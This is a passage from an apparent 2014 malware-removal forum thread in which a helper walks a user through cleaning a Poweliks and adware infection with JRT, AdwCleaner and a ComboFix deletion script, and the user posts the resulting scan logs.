hpdevmgmt REG_MULTI_SZ   hpqcxs08 hpqddsvc
LocalServiceAndNoImpersonation REG_MULTI_SZ   FontCache
.
Contents of the 'Scheduled Tasks' folder
.
2014-08-25 c:\windows\Tasks\GlaryInitialize 5.job
- c:\program files\Glary Utilities 5\Initialize.exe [2014-08-18 01:05]
.
2014-08-25 c:\windows\Tasks\RtlNICDiagVistaStart.job
- c:\program files\Realtek\RTNICDiag\RTNICDiag.exe [2008-08-06 11:44]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com/
uInternet Settings,ProxyOverride = *.local;<local>
TCP: DhcpNameServer = 192.168.2.1 66.18.32.2 66.18.32.3
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2014-08-25 14:21
Windows 6.0.6002 Service Pack 2 NTFS
.
scanning hidden processes ...  
.
scanning hidden autostart entries ... 
.
scanning hidden files ...  
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
Completion time: 2014-08-25  14:24:35
ComboFix-quarantined-files.txt  2014-08-25 18:24
ComboFix2.txt  2014-08-25 15:10
ComboFix3.txt  2014-08-24 19:45
ComboFix4.txt  2014-08-23 20:16
ComboFix5.txt  2014-08-25 18:11
.
Pre-Run: 238,774,767,616 bytes free
Post-Run: 238,748,184,576 bytes free
.
- - End Of File - - A4970DA8F07396A80757CBAF1665523D
5C616939100B85E558DA92B899A0FC36

It's not only "poweliks" that indicates this infection. 
 
 
However, part 2 of my plan:


Fix with Junkware Removal Tool

Please download JRT by Thisisu and save the file to your desktop.
Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.

  • Right-click on the JRT icon and select Run as Administrator to start the tool.
  • Follow the prompts and let this process run uninterrupted.
  • This scan can take a while, depending on your System specs.
  • Upon completion, a log (JRT.txt) will open on your desktop.

Please include the contents of that file in your reply.

Do not forget to re-enable your previously switched off protection software!
Please also manually reboot your machine after this procedure.


Fix with AdwCleaner

Please download AdwCleaner by Xplode and save the file to your desktop.

  • Right-click on the AdwCleaner icon and select Run as Administrator to start the tool.
  • Follow the prompts and click Scan.
  • When finished, please click Clean.
  • Upon completion, click Report. A log (AdwCleaner[s*].txt) will open.

Please include the contents of that file in your reply.


JRT

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.1.4 (04.06.2014:1)
OS: Windows Vista Home Premium x86
Ran by savas.kyriakidis on Mon 08/25/2014 at 16:18:32.89
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
~~~ Services
 
 
 
~~~ Registry Values
 
Suspicious HKCU\..\Run entries found. Trojan:JS/Medfos.B?
 
    Value Name          Type                             Value Data                     
========================================================================================
    UINoteworthy    REG_SZ    C:\Windows\system32\rundll32.exe "C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll",DllRegisterServer
 
 
 
 
~~~ Registry Keys
 
 
 
~~~ Files
 
 
 
~~~ Folders
 
 
 
~~~ Event Viewer Logs were cleared
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Mon 08/25/2014 at 16:21:59.88
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
AdwCleaner
 
# AdwCleaner v3.308 - Report created 25/08/2014 at 17:03:28
# Updated 20/08/2014 by Xplode
# Operating System : Windows Vista Home Premium Service Pack 2 (32 bits)
# Username : savas.kyriakidis - SAVASKYRIAKI-PC
# Running from : F:\AdwCleaner.exe
# Option : Clean
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
 
***** [ Scheduled Tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v9.0.8112.16421
 
 
-\\ Google Chrome v
 
[ File : C:\Users\Rita\AppData\Local\Google\Chrome\User Data\Default\preferences ]
 
 
*************************
 
AdwCleaner[R0].txt - [8912 octets] - [23/08/2014 11:51:26]
AdwCleaner[R1].txt - [984 octets] - [25/08/2014 16:34:51]
AdwCleaner[s0].txt - [8774 octets] - [23/08/2014 11:53:04]
AdwCleaner[s1].txt - [832 octets] - [25/08/2014 17:03:28]
 
########## EOF - C:\AdwCleaner\AdwCleaner[s1].txt - [891 octets] ##########
 

OK, now let's take care of the other nasties and your AV program. Tell me - do you really think that AVG 2011 will protect you in the second half of 2014? I strongly recommend changing it. You also have Microsoft Security Essentials installed. You do realize that two AVs may fight each other, cause slowness, conflicts or even block your machine?



Fix with ComboFix

Let's prepare a script for ComboFix to mark some things for deletion.

  • Press the Windows key + R on your keyboard at the same time.
  • A Run window should appear in the lower left corner. Type in notepad.exe and press Enter.
  • In the window that opens, paste in the following script:
    KillAll::
    Folder::
    c:\programdata\IrfuqApivh
    c:\users\savas.kyriakidis\AppData\Roaming\Puorfu
    c:\users\savas.kyriakidis\AppData\Local\browser_dir
    c:\users\savas.kyriakidis\AppData\Local\42a495
    c:\users\savas.kyriakidis\AppData\Roaming\42a495
    C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile
    C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy
    C:\Program Files\AVG\AVG10\Toolbar
    C:\Program Files\Common Files\AVG Secure Search
    File::
    C:\Windows\system32\jsllnzn.dll
    C:\Windows\System32\Tasks\{B7983C11-5FD9-12B1-4EAA-DE223F2AD5D5}
    C:\Users\SAVAS~1.KYR\AppData\Local\Temp\xujxyvl.dll
    C:\Windows\System32\Tasks\Time Trigger Test Task
    C:\Windows\System32\Tasks\Security Center Update - 754758581
    Driver::
    AVG Security Toolbar Service
    vToolbarUpdater
    Registry::
    [HKEY_USERS\S-1-5-21-3726736968-409882640-1958551794-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "UINoteworthy"=-
    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
    "{2318C2B1-4965-11D4-9B18-009027A5CD4F}"=-
    [-HKEY_CLASSES_ROOT\CLSID\{2318C2B1-4965-11D4-9B18-009027A5CD4F}]
  • Go to File menu and select Save as.
  • Make sure that the Save as type option is set to Text files (*.txt) and the place to save will be your desktop.
  • Name the file CFScript and select Save.

Your CFScript.txt file should appear on your desktop.

Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.

  • Now drag your CFScript file and drop it onto the ComboFix icon.
  • This will start ComboFix. Let it run uninterrupted!
  • A reboot may be needed during this run. Allow it.
  • When finished, it shall produce a log for you at C:\ComboFix.txt and display it.

Please include that log in your next reply.

If you encounter any issues with your internet connection after running ComboFix, please visit this link.
If an error about an operation on a key marked for deletion appears after running the tool, please reboot your machine.
Do not forget to turn on your previously switched-off protection software!


Yes. I have no illusions that having an AV solution from 2011 will be effective in 2014, which is why I do not run AVG 2011 on my personal system. Also, I am fully aware of the issue of competing AV solutions, which is why I run a solitary program on my personal system. I will, however, pass along your recommendations to the owner of this infected PC.

 

Here is the requested Combofix log. The automatically-generated Chrome windows appear to have stopped.

 

ComboFix 14-08-24.01 - savas.kyriakidis 08/26/2014   8:27.6.2 - x86
Running from: F:\ComboFix.exe
Command switches used :: F:\CFScript.txt
.
FILE ::
"c:\users\SAVAS~1.KYR\AppData\Local\Temp\xujxyvl.dll"
"c:\windows\system32\jsllnzn.dll"
"c:\windows\System32\Tasks\{B7983C11-5FD9-12B1-4EAA-DE223F2AD5D5}"
"c:\windows\System32\Tasks\Security Center Update - 754758581"
"c:\windows\System32\Tasks\Time Trigger Test Task"
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\programdata\IrfuqApivh
c:\users\savas.kyriakidis\AppData\Local\42a495
c:\users\savas.kyriakidis\AppData\Local\browser_dir
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\36.0.1985.125.manifest
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\chrome.dll
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\chrome_100_percent.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\chrome_200_percent.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\chrome_child.dll
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\chrome_elf.dll
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\d3dcompiler_43.dll
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\d3dcompiler_46.dll
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\default_apps\docs.crx
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\default_apps\drive.crx
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\default_apps\external_extensions.json
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\default_apps\gmail.crx
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\default_apps\search.crx
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\default_apps\youtube.crx
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\delegate_execute.exe
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Extensions\external_extensions.json
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\ffmpegsumo.dll
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\icudtl.dat
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\libegl.dll
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\libexif.dll
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\libglesv2.dll
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\libpeerconnection.dll
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\am.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\ar.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\bg.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\bn.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\ca.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\cs.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\da.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\de.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\el.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\en-GB.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\en-US.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\es-419.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\es.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\et.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\fa.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\fi.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\fil.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\fr.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\gu.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\he.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\hi.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\hr.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\hu.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\id.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\it.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\ja.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\kn.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\ko.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\lt.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\lv.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\ml.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\mr.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\ms.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\nb.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\nl.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\pl.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\pt-BR.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\pt-PT.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\ro.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\ru.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\sk.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\sl.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\sr.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\sv.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\sw.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\ta.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\te.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\th.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\tr.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\uk.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\vi.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\zh-CN.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\Locales\zh-TW.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\metro_driver.dll
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\mksnapshot.ia32.exe.assert.manifest
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\nacl_irt_x86_32.nexe
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\nacl_irt_x86_64.nexe
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\nacl64.exe
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\pdf.dll
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\PepperFlash\manifest.json
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\PepperFlash\pepflashplayer.dll
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\ppgooglenaclpluginchrome.dll
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\resources.pak
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\secondarytile.png
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\VisualElements\logo.png
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\VisualElements\smalllogo.png
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\VisualElements\splash-620x300.png
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\widevinecdmadapter.dll
c:\users\savas.kyriakidis\AppData\Local\browser_dir\36.0.1985.125\xinput1_3.dll
c:\users\savas.kyriakidis\AppData\Local\browser_dir\browser.exe
c:\users\savas.kyriakidis\AppData\Local\browser_dir\debug.log
c:\users\savas.kyriakidis\AppData\Local\browser_dir\Dictionaries\en-US-3-0.bdic
c:\users\savas.kyriakidis\AppData\Local\browser_dir\wow_helper.exe
c:\users\savas.kyriakidis\AppData\Local\UINoteworthy
c:\users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ec1ac8a1
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\JawaVinyl.pac
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ToolHumble\manifest.json
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ToolHumble\NoteworthyModulator.js
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\36.0.1985.143.manifest
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\chrome.dll
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\chrome_100_percent.pak
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\chrome_200_percent.pak
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\chrome_child.dll
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\chrome_elf.dll
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\d3dcompiler_43.dll
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\d3dcompiler_46.dll
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\default_apps\docs.crx
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\default_apps\drive.crx
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\default_apps\external_extensions.json
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\default_apps\gmail.crx
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\default_apps\search.crx
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\default_apps\youtube.crx
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\delegate_execute.exe
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\Extensions\external_extensions.json
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\ffmpegsumo.dll
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\icudtl.dat
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\libegl.dll
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\libexif.dll
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\libglesv2.dll
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\libpeerconnection.dll
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\Locales\en-GB.pak
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\Locales\en-US.pak
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\metro_driver.dll
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\mksnapshot.ia32.exe.assert.manifest
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\nacl_irt_x86_32.nexe
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\nacl_irt_x86_64.nexe
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\nacl64.exe
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\pdf.dll
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\PepperFlash\manifest.json
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\PepperFlash\pepflashplayer.dll
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\ppgooglenaclpluginchrome.dll
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\resources.pak
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\secondarytile.png
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\VisualElements\logo.png
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\VisualElements\smalllogo.png
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\VisualElements\splash-620x300.png
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\widevinecdmadapter.dll
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\36.0.1985.143\xinput1_3.dll
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\debug.log
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\VisualElementsManifest.xml
c:\users\savas.kyriakidis\AppData\Roaming\42a495
c:\users\savas.kyriakidis\AppData\Roaming\Puorfu
c:\windows\System32\Tasks\{B7983C11-5FD9-12B1-4EAA-DE223F2AD5D5}
c:\windows\System32\Tasks\Security Center Update - 754758581
c:\windows\System32\Tasks\Time Trigger Test Task
.
.
(((((((((((((((((((((((((((((((((((((((   Drivers/Services   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
-------\Service_AVG Security Toolbar Service
-------\Service_vToolbarUpdater
.
.
(((((((((((((((((((((((((   Files Created from 2014-07-26 to 2014-08-26  )))))))))))))))))))))))))))))))
.
.
2014-08-26 12:37 . 2014-08-26 13:29 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\temp
2014-08-26 12:37 . 2014-08-26 12:37 -------- d-----w- c:\users\Rita\AppData\Local\temp
2014-08-26 12:37 . 2014-08-26 12:37 -------- d-----w- c:\users\Guest\AppData\Local\temp
2014-08-26 12:37 . 2014-08-26 12:37 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-08-23 20:54 . 2014-08-25 17:46 -------- d-----w- C:\FRST
2014-08-23 20:30 . 2014-08-25 13:35 110296 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-08-23 20:30 . 2014-08-25 12:26 -------- d-----w- c:\program files\Malwarebytes Anti-Malware
2014-08-23 20:30 . 2014-05-12 11:26 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-08-23 20:30 . 2014-05-12 11:25 74456 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-08-23 20:30 . 2014-05-12 11:25 23256 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-08-23 15:51 . 2014-08-25 21:03 -------- d-----w- C:\AdwCleaner
2014-08-23 15:42 . 2014-08-23 15:42 -------- d-----w- c:\windows\ERUNT
2014-08-22 21:06 . 2013-09-04 18:57 24040 ----a-w- c:\windows\system32\drivers\gfiutil.sys
2014-08-22 21:06 . 2013-05-23 12:39 43368 ----a-w- c:\windows\system32\drivers\gfiark.sys
2014-08-22 21:05 . 2014-08-23 01:40 -------- d-----w- C:\VIPRERESCUE
2014-08-22 21:05 . 2014-08-22 21:05 -------- d-----w- C:\EEK
2014-08-22 18:00 . 2014-08-23 20:48 -------- d-----w- c:\programdata\HitmanPro
2014-08-22 17:41 . 2014-08-22 17:41 -------- d-----w- c:\programdata\DameWare Development
2014-08-22 17:41 . 2014-08-22 17:54 -------- d-----w- c:\windows\dwrcs
2014-08-20 23:17 . 2014-08-20 23:17 319456 ----a-w- c:\windows\DIFxAPI.dll
2014-08-20 22:12 . 2014-08-19 22:12 75264 ----a-w- c:\windows\system32\drivers\dfsc.sys
2014-08-20 03:07 . 2014-08-20 03:07 -------- d-----w- c:\programdata\GlarySoft
2014-08-16 21:57 . 2014-08-17 21:23 -------- d-----w- c:\programdata\AVG2014
2014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 16:05 . 2014-08-16 16:05 -------- d-----w- c:\programdata\SlimWare Utilities Inc
2014-08-16 16:04 . 2014-08-16 16:04 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-16 00:57 . 2014-08-16 16:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-16 00:56 . 2014-08-16 13:22 -------- d-----w- c:\program files\DriverUpdate
2014-08-15 17:04 . 2014-08-15 17:21 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-14 22:20 . 2014-08-14 22:20 17216 ----a-w- c:\windows\system32\drivers\GUBootStartup.sys
2014-08-14 22:19 . 2014-08-04 07:06 101664 ----a-w- c:\windows\system32\BootDefrag.exe
2014-08-14 22:19 . 2014-07-18 07:11 16064 ----a-w- c:\windows\system32\drivers\BootDefragDriver.sys
2014-08-14 22:19 . 2014-08-23 15:16 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-14 22:19 . 2014-08-14 22:19 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 22:19 . 2014-08-25 20:32 -------- d-----w- c:\program files\Glary Utilities 5
2014-08-14 01:28 . 2014-08-14 01:28 -------- d-----w- c:\program files\iPod
2014-08-14 01:28 . 2014-08-14 01:31 -------- d-----w- c:\programdata\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-14 00:53 . 2014-08-14 00:53 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin5.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin4.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin3.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin2.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin.dll
2014-08-14 00:51 . 2014-08-14 00:52 -------- d-----w- c:\program files\QuickTime
2014-08-13 01:20 . 2014-08-13 01:20 -------- d-----w- c:\programdata\WindowsSearch
2014-08-12 20:33 . 2014-08-12 20:37 20480 ----a-w- c:\program files\Internet Explorer\version1.dll
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-06-17 20:17 . 2014-06-17 20:17 147736 ----a-w- c:\windows\system32\drivers\avgidshx.sys
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ehTray.exe"="c:\windows\ehome\ehTray.exe" [2008-01-21 125952]
"Akamai NetSession Interface"="c:\users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe" [2014-04-18 4672920]
"iCloudServices"="c:\program files\Common Files\Apple\Internet Services\iCloudServices.exe" [2013-10-31 59720]
"com.apple.dav.bookmarks.daemon"="c:\program files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe" [2013-10-02 59720]
"ApplePhotoStreams"="c:\program files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe" [2013-10-31 59720]
"GUDelayStartup"="c:\program files\Glary Utilities 5\StartupManager.exe" [2014-08-18 37152]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ECenter"="c:\dell\E-Center\EULALauncher.exe" [2008-02-29 17920]
"RtHDVCpl"="RtHDVCpl.exe" [2008-03-06 4706304]
"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2006-11-10 90112]
